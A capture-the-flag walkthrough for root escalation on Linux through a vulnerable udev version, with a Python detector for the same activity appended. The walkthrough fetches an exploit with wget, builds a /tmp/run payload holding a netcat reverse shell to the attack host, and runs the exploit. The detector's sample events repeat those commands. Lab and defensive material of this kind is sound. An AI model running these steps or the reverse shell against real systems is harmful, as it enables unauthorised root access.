Priv Esc - udevd
If you get a user/daemon shell, you need to escalate your privileges to root. Check udevd…
Four local Linux exploits using udevd to escalate privileges to root:
- Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation
- Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit)
- Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)
- Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
Walk-Through Video described below:
On the target machine, see if udev is running:
ps ax | grep udevd
On the target machine, check the version of udev; run:
dpkg -l | grep udev # On HTB Lame I got version 117-8
Google the udev version, or run searchsploit udev and see what comes up. The YouTuber referenced above liked the 8572.c exploit. Note: the Path column in the searchsploit results is local, relative to: /usr/share/exploitdb/exploits/…
-------------------------------------------------------- ----------------------
 Exploit Title                                           | Path
-------------------------------------------------------- ----------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <   | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4  | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalat  | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege E  | linux/local/21848.rb
-------------------------------------------------------- ----------------------
First, spin up a web server on your Kali box (your attack machine) so we can move the exploit over onto the target box:
service apache2 start
Copy the exploit file over to the web server subdir:
cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/
Check & Read:
- cd into /var/www/html and make sure your file is there. Open it up with an editor and look at what it needs to run.
- The Usage section of the file (at the top, scroll down) will tell you how to use the exploit.
- Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].
- The exploit will execute /tmp/run (a text file named “run” that lives in the /tmp directory) as root so throw whatever payload you want in there.
From your shell over on the target, in the /tmp directory, copy the file from your Kali attack machine onto the target machine using wget:
wget 10.10.14.11/8572.c # that's the IP of your Kali/attack machine
Build your run file on the target, in the /tmp directory. Remember, the /tmp/run file is being used as the payload for the udev exploit. So… build a text file…
touch run
echo '#!/bin/sh' >> run
echo '/bin/netcat -e /bin/sh 10.10.14.11 5555' >> run
When the udev exploit runs, it will execute netcat with the reverse shell going to my attack machine.
You need to compile that .c file you copied to the target machine:
gcc 8572.c -o 8572 # name it whatever you want
Set up the listener on your Kali (host/attack) machine to catch the shell we're throwing out from the target:
nc -nvlp 5555 # make sure it's the same port number
Now the listener is waiting for a connection on the Kali attack machine…
Run the udev exploit on the target using the netlink socket PID as argv[1]. This creates a reverse shell back to your Kali attack machine.
./8572 2687
You should have a reverse shell on your Kali machine with root privileges on the target machine. Done.
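The steps above leave a recognisable process trail on the target: a compile by an unprivileged account inside /tmp, udevd launching /tmp/run as root, and netcat started with -e. The following is an added detection example, not part of the original walkthrough; the one-line event format and the sample events are constructed for illustration.

```python
import re

# World-writable locations where an unprivileged user can stage files.
WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Assumed event format (constructed for this example, not a real tool's output):
#   uid=<n> cwd=<dir> parent=<parent process name> cmd=<command line>
LINE = re.compile(r"^uid=(\d+) cwd=(\S+) parent=(\S+) cmd=(.+)$")

# Constructed sample events mirroring the walkthrough, plus benign noise.
SAMPLE_EVENTS = """\
uid=1 cwd=/tmp parent=sh cmd=wget 10.10.14.11/8572.c
uid=1 cwd=/tmp parent=sh cmd=gcc 8572.c -o 8572
uid=0 cwd=/ parent=cron cmd=/usr/sbin/logrotate /etc/logrotate.conf
uid=0 cwd=/ parent=udevd cmd=/tmp/run
uid=0 cwd=/ parent=run cmd=/bin/netcat -e /bin/sh 10.10.14.11 5555
uid=0 cwd=/ parent=udevd cmd=/sbin/modprobe -q usb_storage
"""

def classify(line):
    """Return the name of the rule a process event trips, or None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    uid, cwd, parent, cmd = int(m[1]), m[2], m[3], m[4]
    argv = cmd.split()
    prog = argv[0].rsplit("/", 1)[-1]
    # udevd should only run helpers from system paths, never from /tmp.
    if parent == "udevd" and argv[0].startswith(WRITABLE):
        return "udevd-exec-from-writable-dir"
    # netcat's -e option hands a program's stdio to the network peer.
    if prog in ("nc", "netcat", "ncat") and "-e" in argv[1:]:
        return "netcat-exec-flag"
    # A service account compiling code inside a world-writable directory.
    if prog in ("gcc", "cc") and uid != 0 and (cwd + "/").startswith(WRITABLE):
        return "unprivileged-compile-in-writable-dir"
    return None

def scan(text):
    """Return (line_number, rule) for every event that matches a rule."""
    return [(n, rule) for n, line in enumerate(text.splitlines(), 1)
            if (rule := classify(line))]

if __name__ == "__main__":
    for n, rule in scan(SAMPLE_EVENTS):
        print(f"event {n}: {rule}")
```

The udevd rule is the most specific of the three: legitimate udev helpers live under system directories, so any child of udevd started from a world-writable path is worth an alert on its own.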